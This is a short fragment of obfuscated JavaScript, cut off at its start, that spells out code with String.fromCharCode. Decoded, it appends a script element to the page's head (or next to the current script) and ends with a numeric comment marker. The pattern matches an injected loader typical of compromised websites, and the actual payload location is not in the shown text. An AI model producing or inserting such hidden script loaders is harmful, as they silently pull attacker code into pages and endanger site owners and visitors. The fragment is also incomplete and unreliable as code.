,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/